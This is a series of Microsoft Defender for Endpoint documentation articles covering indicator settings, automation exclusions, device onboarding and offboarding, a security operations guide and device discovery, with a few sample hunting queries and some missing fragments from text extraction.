severity Enum The severity of the indicator. Possible values are:

Informational, Low, Medium, and High. Optional
recommendedActions String TI indicator alert recommended actions. Optional
rbacGroups String Comma-separated list of RBAC groups the indicator

would be applied to. Optional
category String Category of the alert. Examples include: Execution and

credential access. Optional
mitretechniques String MITRE techniques code/id (comma separated). For

more information, see Enterprise tactics . Optional
It's recommended to add a value in category when a
MITRE technique.
GenerateAlert String Whether the alert should be generated. Possible Values

are: True or False. Optional
７ Note
Classless Inter-Domain Routing (CIDR) notation for IP addresses is not supported.

For more information, see Microsoft Defender for Endpoint alert categories are
now aligned with MITRE ATT&CK! .
Watch this video to learn how Microsoft Defender for Endpoint provides multiple ways
to add and manage Indicators of compromise (IoCs).
https://www.microsoft.com/en-us/videoplayer/embed/RE4qLVw?postJsllMsg=true
See also
Create indicators
 Tip
Feedback

Manage automation file uploads
Article • 11/15/2023
Applies to:

Enable the content analysis capability so that certain files and email attachments can
automatically be uploaded to the cloud for additional inspection in Automated
investigation.
Microsoft uses various file investigation mechanisms to inspect and analyze files.
Identify the files and email attachments by specifying the file extension names and email
attachment extension names.
For example, if you add exe and bat as file or attachment extension names, then all files
or attachments with those extensions will automatically be sent to the cloud for
additional inspection during Automated investigation.
７ Note
Microsoft securely stores the files submitted for a six-month period. Files are
promptly deleted after six months.
Add file extension names and attachment

extension names.
2. In the navigation pane, select Settings > Endpoints > Rules > Automation
uploads.
3. Toggle the content analysis setting between On and Off.

4. Configure the following extension names and separate extension names with a
comma:
File extension names - Suspicious files except email attachments will be

submitted for additional inspection
Related topics
Manage automation folder exclusions
 Tip
Feedback

Manage automation folder exclusions
Article • 11/15/2023
Applies to:

Automation folder exclusions allow you to specify folders that the Automated
investigation will skip.
You can control the following attributes about the folder that you'd like to be skipped:
Folders: You can specify a folder and its subfolders to be skipped.
７ Note
At this time, use of wild cards as a way to exclude files under a directory is not
yet supported.
Extensions of the files: You can specify the extensions to exclude in a specific
directory. The extensions are a way to prevent an attacker from using an excluded
folder to hide an exploit. The extensions explicitly define which files to ignore.
File names: You can specify the file names that you want to be excluded in a
specific directory. The names are a way to prevent an attacker from using an
excluded folder to hide an exploit. The names explicitly define which files to ignore.
Add an automation folder exclusion

2. In the navigation pane, select Settings > Endpoints > Rules > Automation folder
exclusions.
3. Click New folder exclusion.
4. Enter the folder details:

Folder
Extensions
File names
Description
5. Click Save.
７ Note
Live Response commands to collect or examine excluded files will fail with error:
"File is excluded". In addition, automated investigations will ignore the excluded
items.
Edit an automation folder exclusion

exclusions.
2. Click Edit on the folder exclusion.
3. Update the details of the rule and click Save.
Remove an automation folder exclusion

exclusions.
2. Click Remove exclusion.
Related articles
Manage automation allowed/blocked lists
Manage automation file uploads
 Tip
Feedback

Onboard to Microsoft Defender for
Endpoint
Article • 07/10/2023
Applies to:

Onboard devices using any of the supported

management tools
The deployment tool you use influences how you onboard endpoints to the service.
To start onboarding your devices:
1. Go to Select deployment method.

2. Choose the Operating System for the devices you wish to Onboard.
3. Select the tool you plan to use.
4. Follow the instructions to Onboard your devices.
This video provides a quick overview of the onboarding process and the different tools
and methods.
https://www.microsoft.com/en-us/videoplayer/embed/RE4bGqr?postJsllMsg=true
Deploy using a ring-based approach
New deployments
A ring-based approach is a method of identifying a set of endpoints to onboard and
verifying that certain criteria are met before proceeding to deploy the service to a larger
set of devices. You can define the exit criteria for each ring and ensure that they're
satisfied before moving on to the next ring. Adopting a ring-based deployment helps
reduce potential issues that could arise while rolling out the service.
This table provides an example of the deployment rings you might use:
ﾉ Expand table
Deployment Description
ring
Evaluate Ring 1: Identify 50 devices to onboard to the service for testing.
Pilot Ring 2: Identify and onboard the next 50-100 endpoints in a production
environment. Microsoft Defender for Endpoint supports various endpoints that
you can onboard to the service, for more information, see Select deployment
method.
Full Ring 3: Roll out service to the rest of environment in larger increments. For more
deployment information, see Get started with your Microsoft Defender for Endpoint
deployment.
Exit criteria
An example set of exit criteria for each ring can include:
Devices show up in the device inventory list

Alerts appear in dashboard
Run a simulated attack on a device
Existing deployments
Windows endpoints
For Windows and/or Windows Servers, you select several machines to test ahead of time
(before patch Tuesday) by using the Security Update Validation program (SUVP).
What is the Security Update Validation Program

Software Update Validation Program and Microsoft Malware Protection Center
Establishment - TwC Interactive Timeline Part 4
７ Note
Ideally at least one security admin and one developer so that you are able to find
compatibility, performance and reliability issues before the build makes it into the
Current channel.
２ Warning
Example deployments
To provide some guidance on your deployments, in this section we'll guide you through
using two deployment tools to onboard endpoints.
The tools in the example deployments are:

For some additional information and guidance, check out the PDF or Visio to see
the various paths for deploying Defender for Endpoint.
The example deployments will guide you on configuring some of the Defender for
Endpoint capabilities, but you'll find more detailed information on configuring Defender
for Endpoint capabilities in the next step.
Next step
After onboarding the endpoints move on to the next step where you'll configure the
various capabilities such as endpoint detection and response, next-generation
protection, and attack surface reduction.
Step 5 - Configure capabilities
 Tip
Feedback

Offboard devices
Article • 08/01/2023
Applies to:

Platforms
macOS
Linux
Windows Server 2016
Follow the corresponding instructions depending on your preferred deployment

method.
７ Note
The status of a device will be switched to Inactive 7 days after offboarding.
Offboarded devices' data (such as Timeline, Alerts, Vulnerabilities, etc.) will remain
in the portal until the configured retention period expires.
The device's profile (without data) will remain in the Devices List for no longer than
180 days.
In addition, devices that are not active in the last 30 days are not factored in on the
data that reflects your organization's Defender Vulnerability Management exposure
score and Microsoft Secure Score for Devices.
To view only active devices, you can filter by sensor health state, device tags or
machine groups.
Offboard Windows devices

Offboard devices using Mobile Device Management tools
Offboard Servers
Offboard servers

 Tip
Feedback

Ensure your devices are configured
properly
Article • 07/18/2023
Applies to:

With properly configured devices, you can boost overall resilience against threats and
enhance your capability to detect and respond to attacks. Security configuration
management helps ensure that your devices:
Onboard to Microsoft Defender for Endpoint

Meet or exceed the Defender for Endpoint security baseline configuration
Have strategic attack surface mitigations in place
Click Configuration management from the navigation menu to open the Device
configuration management page.
Device configuration management page

You can track configuration status at an organizational level and quickly take action in
response to poor onboarding coverage, compliance issues, and poorly optimized attack
surface mitigations through direct, deep links to device management pages on
Microsoft Intune and Microsoft Defender portal .
In doing so, you benefit from:
Comprehensive visibility of the events on your devices

Robust threat intelligence and powerful device learning technologies for
processing raw events and identifying the breach activity and threat indicators
A full stack of security features configured to efficiently stop the installation of
malicious implants, hijacking of system files and process, data exfiltration, and
other threat activities
Optimized attack surface mitigations, maximizing strategic defenses against threat
activity while minimizing impact to productivity
Enroll devices to Intune management

Device configuration management works closely with Intune device management to
establish the inventory of the devices in your organization and the baseline security
configuration. You will be able to track and manage configuration issues on Intune-
managed Windows devices.
Before you can ensure your devices are configured properly, enroll them to Intune
management. Intune enrollment is robust and has several enrollment options for
Windows devices. For more information about Intune enrollment options, read about
setting up enrollment for Windows devices.
７ Note
To enroll Windows devices to Intune, administrators must have already been

assigned licenses. Read about assigning licenses for device enrollment.
 Tip
To optimize device management through Intune, connect Intune to Defender for

Endpoint.
Obtain required permissions

By default, only users who have been assigned the Global Administrator or the Intune
Service Administrator role on Microsoft Entra ID can manage and assign the device
configuration profiles needed for onboarding devices and deploying the security
baseline.
If you have been assigned other roles, ensure you have the necessary permissions:
Full permissions to device configurations

Full permissions to security baselines
Read permissions to device compliance policies
Read permissions to the organization
Device configuration permissions on Intune
 Tip
To learn more about assigning permissions on Intune, read about creating custom
roles.
In this section
ﾉ Expand table
Topic Description
Get devices onboarded to Defender Track onboarding status of Intune-managed devices and
for Endpoint onboard more devices through Intune.
Increase compliance to the Defender Track baseline compliance and noncompliance. Deploy the
for Endpoint security baseline security baseline to more Intune-managed devices.
Optimize ASR rule deployment and Review rule deployment and tweak detections using
detections impact analysis tools in Microsoft Defender portal .
 Tip
Feedback

Get devices onboarded to Microsoft
Article • 07/18/2023
Applies to:

Each onboarded device adds an additional endpoint detection and response (EDR)
sensor and increases visibility over breach activity in your network. Onboarding also
ensures that a device can be checked for vulnerable components as well security
configuration issues and can receive critical remediation actions during attacks.
Before you can track and manage onboarding of devices:
Enroll your devices to Intune management

Ensure you have the necessary permissions
Watch this video to learn how to easily onboard clients with Microsoft Defender for
Endpoint.
https://www.microsoft.com/en-us/videoplayer/embed/RE4bGqr?
Discover and track unprotected devices

The Onboarding card provides a high-level overview of your onboarding rate by
comparing the number of Windows devices that have actually onboarded to Defender
for Endpoint against the total number of Intune-managed Windows devices.

Card showing onboarded devices compared to the total number of Intune-managed

Windows devices
７ Note
If you used Configuration Manager, the onboarding script, or other onboarding

methods that don't use Intune profiles, you might encounter data discrepancies. To
resolve these discrepancies, create a corresponding Intune configuration profile for
Defender for Endpoint onboarding and assign that profile to your devices.
Onboard more devices with Intune profiles

Defender for Endpoint provides several convenient options for onboarding Windows
devices. For Intune-managed devices, however, you can leverage Intune profiles to
conveniently deploy the Defender for Endpoint sensor to select devices, effectively
onboarding these devices to the service.
From the Onboarding card, select Onboard more devices to create and assign a profile
on Intune. The link takes you to the device compliance page on Intune, which provides a
similar overview of your onboarding state.

Microsoft Defender for Endpoint device compliance page on Intune device management
 Tip
Alternatively, you can navigate to the Defender for Endpoint onboarding

compliance page in the Microsoft Azure portal from All services > Intune >
Device compliance > Microsoft Defender ATP.
７ Note
If you want to view the most up-to-date device data, click on List of devices
without ATP sensor.
From the device compliance page, create a configuration profile specifically for the
deployment of the Defender for Endpoint sensor and assign that profile to the devices
you want to onboard. To do this, you can either:
Select Create a device configuration profile to configure ATP sensor to start with
a predefined device configuration profile.
Create the device configuration profile from scratch.
For more information, read about using Intune device configuration profiles to onboard
devices to Defender for Endpoint.
Related topics
Ensure your devices are configured properly
Increase compliance to the Defender for Endpoint security baseline
Optimize ASR rule deployment and detections
 Tip
Feedback

Updating MMA on Windows devices for
Article • 10/05/2023
） Important
If you've arrived on this page as a result of clicking on a notification at the

Microsoft Defender portal (https://security.microsoft.com ), you have devices in
your environment with outdated agents, and you need to take action (described in
this article) to avoid service disruption. For more details, please reference message
center post MC598631 (requires access to Message Center).
Applies to:

If you're using the Microsoft Monitoring Agent (MMA) on Windows devices, it's
important to keep this agent updated. For Windows Server 2012 R2 and Windows
Server 2016, Microsoft recommends upgrading to the new, unified agent for Defender
for Endpoint. This article describes how to:
Update the MMA on your devices (for devices running Windows 7 SP1 Enterprise,
Windows 7 SP1 Pro, Windows 8.1 Pro, Windows 8.1 Enterprise, and Windows
Server 2008 R2 SP1).
Upgrade to the new, unified agent for Defender for Endpoint (for devices
running Windows Server 2012 R2 and Windows Server 2016).
Update MMA on your devices

This option applies to devices running Windows 7 SP1 Enterprise, Windows 7 SP1 Pro,
Windows 8.1 Pro, Windows 8.1 Enterprise, and Windows Server 2008 R2 SP1.
To help you identify older versions of the MMA inside of your organization, you
can use the "EOSDate" column in advanced hunting. Or, follow the instructions in
Plan for end-of-support software and software versions to use the vulnerability
management feature inside of Microsoft Defender for Endpoint to track
remediation.
See Manage and maintain the Log Analytics agent for Windows and Linux for
instructions on how to upgrade the agent using Azure Automation or a command-
line approach to use with various deployment tools and methods.
Update MMA by using Microsoft Update, through Windows Server Update

Services or Configuration Manager. Use the method that was configured when
MMA was first installed on the device.
Download the MMA setup file:

Windows 64-bit agent: https://go.microsoft.com/fwlink/?LinkId=828603
Windows 32-bit agent: https://go.microsoft.com/fwlink/?LinkId=828604
Upgrade to the new, unified agent for

This option applies to servers running Windows Server 2012 R2 and Windows Server 2016.
A new agent was released in April 2022 for Windows Server 2012 R2 and Windows
Server 2016. The new agent doesn't depend on MMA. There are significant benefits to
moving to this new agent, such as a vastly extended feature set. To learn more, see Tech
Community Blog: Defending Windows Server 2012 R2 and 2016 .
Microsoft Defender Vulnerability Management provides an assessment (SCID-

2030) titled "Update Microsoft Defender for Endpoint core components" that
allows you to track which Windows Server 2012 R2 or Windows Server 2016
machines haven't been upgraded yet.
See Server migration scenarios from the previous, MMA-based Microsoft Defender
for Endpoint solution to understand your options for upgrading to the new agent.
If you're using Microsoft Endpoint Configuration Manager (SCCM/ConfigMgr) 2107

or later to manage your servers running Windows Server 2012 R2 or Windows
Server 2016, see Migrating servers from Microsoft Monitoring Agent to the unified
solution to perform an orchestrated upgrade.
If you're using Microsoft Endpoint Configuration Manager (SCCM/ConfigMgr) 2207

or later to manage your servers running Windows Server 2012 R2 or Windows
Server 2016, see Onboarding to Microsoft Defender for Endpoint with
Configuration Manager 2207 and later versions to perform an automated upgrade.
If you're using Microsoft Defender for Cloud with servers running Windows Server
2012 R2 or Windows Server 2016, you can automate the upgrade by selecting
Enable unified solution. See Users with Defender for Servers enabled and
Microsoft Defender for Endpoint deployed.
Important information about MMA

If you've determined that you aren't using the MMA for Defender for Endpoint, or
you've already updated your agent, no other steps are needed.
If you are, however, still using MMA for other purposes (such as Log Analytics),
MMA is currently set to retire in August 2024. See We're retiring the Log Analytics
agent in Azure Monitor on 31 August 2024 . Depending on your particular
scenario, now might be a good time to upgrade to Azure Monitoring Agent, the
successor of MMA.
） Important
Devices running Windows 7 SP1, Windows 8.1, or Windows Server 2008 R2 remain
dependent on MMA.
Devices running Windows Server 2012 R2 or Windows Server 2016 should be

upgraded to the new, unified solution so that they no longer require the use of
MMA.
AMA cannot be used as a substitute for Defender for Endpoint.
See also
Make the switch from non-Microsoft endpoint protection to Microsoft Defender
for Endpoint
Microsoft Defender for Endpoint deployment overview
Onboard to the Microsoft Defender for Endpoint service
 Tip
Feedback

Microsoft Defender XDR time zone
settings
Article • 07/18/2023
Applies to:


Use the Time zone menu to configure the time zone and view license information.
Time zone settings

The aspect of time is important in the assessment and analysis of perceived and actual
cyberattacks.
Cyberforensic investigations often rely on time stamps to piece together the sequence
of events. It's important that your system reflects the correct time zone settings.
Microsoft Defender for Endpoint can display either Coordinated Universal Time (UTC) or
local time.
Your current time zone setting is shown in the Microsoft Defender for Endpoint menu.
You can change the displayed time zone in the Time zone menu.
UTC time zone

Microsoft Defender for Endpoint uses UTC time by default.
Setting the Microsoft Defender for Endpoint time zone to UTC will display all system
timestamps (alerts, events, and others) in UTC for all users. This can help security
analysts working in different locations across the globe to use the same time stamps
while investigating events.
Local time zone

You can choose to have Microsoft Defender for Endpoint use local time zone settings.
All alerts and events will be displayed using your local time zone.
The local time zone is taken from your device's regional settings. If you change your
regional settings, the Microsoft Defender for Endpoint time zone will also change.
Choosing this setting means that the timestamps displayed in Microsoft Defender for
Endpoint will be aligned to local time for all Microsoft Defender for Endpoint users.
Analysts located in different global locations will now see the Microsoft Defender for
Endpoint alerts according to their regional settings.
Choosing to use local time can be useful if the analysts are located in a single location.
In this case it might be easier to correlate events to local time, for example, when a local
user clicked on a suspicious email link.
Set the time zone

The Microsoft Defender for Endpoint time zone is set by default to UTC. Setting the time
zone also changes the times for all Microsoft Defender for Endpoint views.
To set the time zone:


1. Click the Time zone menu.
2. Select the Timezone UTC indicator.
3. Select Timezone UTC or your local time zone, for example -7:00.
Regional settings
To apply different date formats for Microsoft Defender for Endpoint, use regional
settings for Internet Explorer (IE) and Microsoft Edge (Edge). If you're using another
browser such as Google Chrome, follow the required steps to change the time and date
settings for that browser.
Internet Explorer (IE) and Microsoft Edge

IE and Microsoft Edge use the Region settings configured in the Clocks, Language, and
Region option in the Control panel.
Known issues with regional formats
Date and time formats
There are some known issues with the time and date formats. If you configure your
regional settings to anything other than the supported formats, the portal may not
correctly reflect your settings.
The following date and time formats are supported:
Date format MM/dd/yyyy

Date format dd/MM/yyyy
Time format hh:mm:ss (12 hour format)
The following date and time formats are currently not supported:
Date format yyyy-MM-dd

Date format dd-MMM-yy
Date format dd/MM/yy
Date format MM/dd/yy
Date format with yy. Will only show yyyy.
Time format HH:mm:ss (24 hour format)
Decimal symbol used in numbers
Decimal symbol used is always a dot, even if a comma is selected in the Numbers
format settings in Region settings. For example, 15,5K is displayed as 15.5K.
 Tip
Feedback
Security Operations Guide
Article • 11/15/2023
Applies to:

This article gives an overview of the requirements and tasks for successfully operating
Microsoft Defender for Endpoint in your organization. These tasks help your security
operations center (SOC) effectively detect and respond to Microsoft Defender for
Endpoint detected security threats.
This article also describes daily, weekly, monthly, and ad-hoc tasks your security team
can perform for your organization.
７ Note
These are recommended steps; check them against your own policies and
environment to make sure they are fit for purpose.
Prerequisites:
The Microsoft Defender Endpoint should be set up to support your regular security
operations process. Although not covered in this document, the following articles
provide configuration and setup information:
Configure general Defender for Endpoint settings

General
Permissions
Rules
Device management
Configure Microsoft Defender Security Center time zone settings
Set up Microsoft Defender XDR incident notifications
To get email notifications on defined Microsoft Defender XDR incidents, it's

recommended that you configure email notifications. See Get incident notifications
by email.
Connect to SIEM (Sentinel)
If you have existing security information and event management (SIEM) tools, you
can integrate them with Microsoft Defender XDR. See Integrate your SIEM tools
with Microsoft Defender XDR and Microsoft Defender XDR integration with
Microsoft Sentinel.
Review data discovery configuration
Review the Microsoft Defender for Endpoint device discovery configuration to

ensure it's configured as required. See Device discovery overview.
Daily activities
General
Review actions
In the action center, review the actions that have been taken in your environment,
both automated and manual. This information helps you validate that automated
investigation and response (AIR) is performing as expected and identify any
manual actions that need to be reviewed. See Visit the Action center to see
remediation actions.
Security operations team

Monitor the Microsoft Defender XDR Incidents queue
When Microsoft Defender for Endpoint identifies Indicators of compromise (IOCs)

or Indicators of attack (IOAs) and generates an alert, the alert is included in an
incident and displayed in the Incidents queue in the Microsoft Defender portal
Review these incidents to respond to any Microsoft Defender for Endpoint alerts
and resolve once the incident has been remediated. See Get incident notifications
by email and View and organize the Microsoft Defender for Endpoint Incidents
queue.
Manage false positive and false negative detections
Review the incident queue, identify false positive and false negative detections and
submit them for review. This helps you effectively manage alerts in your
environment and make your alerts more efficient. See Address false
positives/negatives in Microsoft Defender for Endpoint.
Review threat analytics high-impact threats
Review threat analytics to identify any campaigns that are impacting your
environment. The "High-impact threats" table lists the threats that have had the
highest impact to the organization. This section ranks threats by the number of
devices that have active alerts. See Track and respond to emerging threats through
threat analytics.
Security administration team

Review health reports
Review health reports to identify any device health trends that need to be
addressed. The device health reports cover Microsoft Defender for Endpoint AV
signature, platform health, and EDR health. See Device health reports in Microsoft
Check Endpoint detection and response (EDR) sensor health
EDR health is maintaining the connection to the EDR service to make sure that
Defender for Endpoint is receiving the required signals to alert and identify
vulnerabilities.
Review unhealthy devices. See Device health, Sensor health & OS report.
Check Microsoft Defender Antivirus health
Viewing the status of Microsoft Defender Antivirus updates is critical for the best
performance of Defender for Endpoint in your environment and up-to-date
detections. The device health page shows current status for platform, intelligence,
and engine version. See the Device health, Microsoft Defender Antivirus health
report.
Weekly activities
General
Message Center
Microsoft Defender XDR uses the Microsoft 365 Message center to notify you of
upcoming changes, such as new and changed features, planned maintenance, or
other important announcements.
Review the Message center messages to understand any upcoming changes that
impact your environment.
You can access this in the Microsoft 365 admin center under the Health tab. See
How to check Microsoft 365 service health.
Security operations team

Review threat reporting
Review health reports to identify any device threat trends that need to be
addressed. See Threat protection report.
Review threat analytics
Review threat analytics to identify any campaigns that affect your environment. See
Track and respond to emerging threats through threat analytics.

Review threat and vulnerability (TVM) status
Review TVM to identify any new vulnerabilities and recommendations that require
action. See Vulnerability management dashboard.
Review attack surface reduction reporting
Review ASR reports to identify any files that affect your environment. See Attack
surface reduction rules report.
Review web protection events
Review the web defense report to identify any IP addresses or URLs that are
blocked. See Web protection.
Monthly activities
General
Review the following articles to understand recently released updates:
What's new in Microsoft Defender for Endpoint on Windows
What's new in Microsoft Defender for Endpoint on Mac
What's new in Microsoft Defender for Endpoint on iOS
What's new in Microsoft Defender for Endpoint on Android

Review device excluded from policy
If any devices are excluded from Defender for Endpoint policies, review and
determine whether the device still needs to be excluded from the policy.
７ Note
Review the troubleshooting mode for troubleshooting. See Get started with
troubleshooting mode in Microsoft Defender for Endpoint.
Periodically
These tasks are seen as maintenance for your security posture and are critical for your
ongoing protection. But as they may take time and effort, it's recommended that you
set a standard schedule that you can maintain to perform these tasks.
Review exclusions
Review exclusions that have been set in your environment to confirm you haven't
created a protection gap by excluding things that are no longer required to be
excluded.
Review Defender policy configurations
Periodically review your Defender configuration settings to confirm that they're set
as required.
Review automation levels

Review automation levels in automated investigation and remediation capabilities.
See Automation levels in automated investigation and remediation.
Review custom detections
Periodically review whether the custom detections that have been created are still
valid and effective. See Review custom detection.
Review alerts suppression
Periodically review any alert suppression rules that have been created to confirm
they're still required and valid. See Review alerts suppression.
Troubleshooting
The following articles provide guidance to troubleshoot and fix errors that you may
experience when setting up your Microsoft Defender for Endpoint service.
Troubleshoot Sensor state

Troubleshoot sensor health issues using Client Analyzer
Troubleshoot live response issues
Collect support logs using LiveAnalyzer
Troubleshoot attack surface reduction issues
Troubleshoot onboarding issues
 Tip
Feedback

Microsoft Defender Vulnerability
Management
Reduce cyber risk with continuous vulnerability discovery and assessment, risk-based
prioritization, and remediation.
Overview
ｅ OVERVIEW
What is Microsoft Defender Vulnerability Management?
Compare Microsoft Defender Vulnerability Management offerings
Get started
ｂ GET STARTED
Get Defender Vulnerability Management
Discover and explore inventories
ｃ HOW-TO GUIDE
Device inventory
Software inventory
Browser extensions
Certificate inventory
Hardware and firmware assessment
Detect and assess threats
ｃ HOW-TO GUIDE
Dashboard insights
Exposure score
Security baselines
Hunt for exposed devices
Authenticated scan for Windows
Identify risk and prioritize remediation
ｃ HOW-TO GUIDE
Address security recommendations
Network share configuration assessment
Exceptions for security recommendations
Plan for end-of-support software
Mitigate zero-day vulnerabilities
Vulnerabilities in my organization
Event timeline
Track and mitigate remediation activities
ｃ HOW-TO GUIDE
Remediate vulnerabilities
Block vulnerable applications
Vulnerable devices report

Device discovery overview
Article • 05/11/2023
Applies to:

Protecting your environment requires taking inventory of the devices that are in your
network. However, mapping devices in a network can often be expensive, challenging,
and time-consuming.
Microsoft Defender for Endpoint provides a device discovery capability that helps you
find unmanaged devices connected to your corporate network without the need for
extra appliances or cumbersome process changes. Device discovery uses onboarded
endpoints, in your network to collect, probe, or scan your network to discover
unmanaged devices. The device discovery capability allows you to discover:
Enterprise endpoints (workstations, servers and mobile devices) that aren't yet
onboarded to Microsoft Defender for Endpoint
Network devices like routers and switches
IoT devices like printers and cameras
Unknown and unmanaged devices introduce significant risks to your network - whether
it's an unpatched printer, network devices with weak security configurations, or a server
with no security controls. Once devices are discovered, you can:
Onboard unmanaged endpoints to the service, increasing the security visibility on

them.
Reduce the attack surface by identifying and assessing vulnerabilities, and
detecting configuration gaps.
Watch this video for a quick overview of how to assess and onboard unmanaged devices
that Microsoft Defender for Endpoint discovered.
https://www.microsoft.com/en-us/videoplayer/embed/RE4RwQz?postJsllMsg=true
In conjunction with this capability, a security recommendation to onboard devices to

Microsoft Defender for Endpoint is available as part of the existing Microsoft Defender
Vulnerability Management experience.
Discovery methods
You can choose the discovery mode to be used by your onboarded devices. The mode
controls the level of visibility you can get for unmanaged devices in your corporate
network.
There are two modes of discovery available:
Basic discovery: In this mode, endpoints passively collect events in your network
and extract device information from them. Basic discovery uses the SenseNDR.exe
binary for passive network data collection and no network traffic is initiated.
Endpoints extract data from every network traffic that is seen by an onboarded
device. With basic discovery, you'll only gain limited visibility of unmanaged
endpoints in your network.
Standard discovery (recommended): This mode allows endpoints to actively find

devices in your network to enrich collected data and discover more devices -
helping you build a reliable and coherent device inventory. In addition to devices
that were observed using the passive method, standard mode also leverages
common discovery protocols that use multicast queries in the network to find even
more devices. Standard mode uses smart, active probing to discover additional
information about observed devices to enrich existing device information. When
Standard mode is enabled, minimal, and negligible network activity generated by
the discovery sensor might be observed by network monitoring tools in your
organization.
You can change and customize your discovery settings, for more information, see
Configure device discovery.
） Important
Standard discovery is the default mode for all customers starting July 19, 2021. You
can choose to change this configuration to basic through the settings page. If you
choose basic mode, you'll only gain limited visibility of unmanaged endpoints in
your network.
７ Note
The discovery engine distinguishes between network events that are received in the
corporate network versus outside of the corporate network. Devices that are not
connected to corporate networks will not be discovered or listed in the device
inventory.
Device inventory
Devices that have been discovered but haven't yet been onboarded and secured by
Microsoft Defender for Endpoint are listed in the device inventory within the Computers
and Mobile tab.
To assess these devices, you can use a filter in the device inventory list called
Onboarding status, which can have any of the following values:
Onboarded: The endpoint is onboarded to Microsoft Defender for Endpoint.

Can be onboarded: The endpoint was discovered in the network and the Operating
System was identified as one that is supported by Microsoft Defender for Endpoint,
but it isn't currently onboarded. We highly recommend onboarding these devices.
Unsupported: The endpoint was discovered in the network but isn't supported by
Insufficient info: The system couldn't determine the supportability of the device.
Enabling standard discovery on more devices in the network can enrich the
discovered attributes.
 Tip
You can always apply filters to exclude unmanaged devices from the device
inventory list. You can also use the onboarding status column on API queries to
filter out unmanaged devices.
For more information, see Device inventory.

Network device discovery
The large number of unmanaged network devices deployed in an organization creates a
large surface area of attack, and represents a significant risk to the entire enterprise.
Microsoft Defender for Endpoint network discovery capabilities helps you ensure
network devices are discovered, accurately classified, and added to the asset inventory.
Network devices aren't managed as standard endpoints, as Defender for Endpoint

doesn't have a sensor built into the network devices themselves. These types of devices
require an agentless approach where a remote scan obtains the necessary information
from the devices. To do this, a designated Microsoft Defender for Endpoint device is
used on each network segment to perform periodic authenticated scans of
preconfigured network devices. Defender for Endpoint's vulnerability management
capabilities provide integrated workflows to secure discovered switches, routers, WLAN
controllers, firewalls, and VPN gateways.
For more information, see Network devices.
Device discovery Integration

To address the challenge of gaining enough visibility to locate, identify, and secure your
complete OT/IOT asset inventory Microsoft Defender for Endpoint now supports the
following integration:
Microsoft Defender for IoT: This integration combines Microsoft Defender for
Endpoint's device discovery capabilities, with the agentless monitoring capabilities
of Microsoft Defender for IoT, to secure enterprise IoT devices connected to an IT
network (for example, Voice over Internet Protocol (VoIP), printers, and smart TVs).
For more information, see Enable Enterprise IoT security with Defender for
Endpoint.
Vulnerability assessment on discovered devices

Vulnerabilities and risks on your devices as well as other discovered unmanaged devices
in the network are part of the current Defender Vulnerability Management flows under
"Security Recommendations" and represented in entity pages across the portal. Search
for "SSH" related security recommendations to find SSH vulnerabilities that are related
for unmanaged and managed devices.

Use advanced hunting on discovered devices

You can use advanced hunting queries to gain visibility on discovered devices. Find
details about discovered devices in the DeviceInfo table, or network-related information
about those devices, in the DeviceNetworkInfo table.
Query discovered devices details

Run this query on the DeviceInfo table to return all discovered devices along with the
most up-to-date details for each device:
query
DeviceInfo
| summarize arg_max(Timestamp, *) by DeviceId // Get latest known good per
device Id
| where isempty(MergedToDeviceId) // Remove invalidated/merged devices
| where OnboardingStatus != "Onboarded"
By invoking the SeenBy function, in your advanced hunting query, you can get detail on
which onboarded device a discovered device was seen by. This information can help
determine the network location of each discovered device and subsequently, help to
identify it in the network.
query
DeviceInfo
| where OnboardingStatus != "Onboarded"
| summarize arg_max(Timestamp, *) by DeviceId
| where isempty(MergedToDeviceId)
| limit 100
| invoke SeenBy()
| project DeviceId, DeviceName, DeviceType, SeenBy
For more information, see the SeenBy() function.
Query network related information

Device discovery leverages Microsoft Defender for Endpoint onboarded devices as a
network data source to attribute activities to non-onboarded devices. The network
sensor on the Microsoft Defender for Endpoint onboarded device identifies two new
connection types:
ConnectionAttempt - An attempt to establish a TCP connection (syn)

ConnectionAcknowledged - An acknowledgment that a TCP connection was
accepted (syn\ack)
This means that when a non-onboarded device attempts to communicate with an

onboarded Microsoft Defender for Endpoint device, the attempt generates a
DeviceNetworkEvent and the non-onboarded device activities can be seen on the
onboarded device timeline, and through the Advanced hunting DeviceNetworkEvents
table.
You can try this example query:
text
DeviceNetworkEvents
| where ActionType == "ConnectionAcknowledged" or ActionType ==
"ConnectionAttempt"
| take 10
Next steps
Configure device discovery
Device discovery FAQs
 Tip
Feedback

Configure device discovery
Article • 04/06/2023
Applies to:

Discovery can be configured to be on standard or basic mode. Use the standard option
to actively find devices in your network, which will better guarantee the discovery of
endpoints and provide richer device classification.
You can customize the list of devices that are used to perform standard discovery. You
can either enable standard discovery on all the onboarded devices that also support this
capability (currently - Windows 10 or later and Windows Server 2019 or later devices
only) or select a subset or subsets of your devices by specifying their device tags.
Set up device discovery

To set up device discovery, take the following configuration steps in Microsoft Defender
portal :
Navigate to Settings > Device discovery
1. If you want to configure Basic as the discovery mode to use on your onboarded
devices, select Basic and then select Save
2. If you've selected to use Standard discovery, select which devices to use for active
probing: all devices or on a subset by specifying their device tags, and then select
Save
７ Note
Standard discovery uses various PowerShell scripts to actively probe devices in the
network. Those PowerShell scripts are Microsoft signed and are executed from the
following location: C:\ProgramData\Microsoft\Windows Defender Advanced Threat
Protection\Downloads\*.ps . For example, C:\ProgramData\Microsoft\Windows
Defender Advanced Threat Protection\Downloads\UnicastScannerV1.1.0.ps1 .
Exclude devices from being actively probed in
standard discovery
If there are devices on your network that shouldn't be actively scanned (for example,
devices used as honeypots for another security tool), you can also define a list of
exclusions to prevent them from being scanned. Note that devices can still be
discovered using Basic discovery mode and can also be discovered through multicast
discovery attempts. Those devices will be passively discovered but won't be actively
probed.
You can configure the devices to exclude in the Exclusions page.
Select networks to monitor

Microsoft Defender for Endpoint analyzes a network and determines if it's a corporate
network that needs to be monitored or a non-corporate network that can be ignored. To
identify a network as corporate, we correlate network identifiers across all tenant's
clients and if most devices in the organization report that they're connected to the same
network name, with the same default gateway and DHCP server address, we assume
that this is a corporate network. Corporate networks are typically chosen to be
monitored. However, you can override this decision by choosing to monitor non-
corporate networks where onboarded devices are found.
You can configure where device discovery can be performed by specifying which
networks to monitor. When a network is monitored, device discovery can be performed
on it.
A list of networks where device discovery can be performed is shown in the Monitored
networks page.
７ Note
The list shows networks that were identified as corporate networks. If less than 50
networks are identified as corporate networks, then list will show up to 50 networks
with the most onboarded devices.
The list of monitored networks is sorted based upon the total number of devices seen
on the network in the last seven days.
You can apply a filter to view any of the following network discovery states:
Monitored networks - Networks where device discovery is performed.
Ignored networks - This network is ignored and device discovery isn't performed
on it.
All - Both monitored and ignored networks are displayed.
Configure the network monitor state

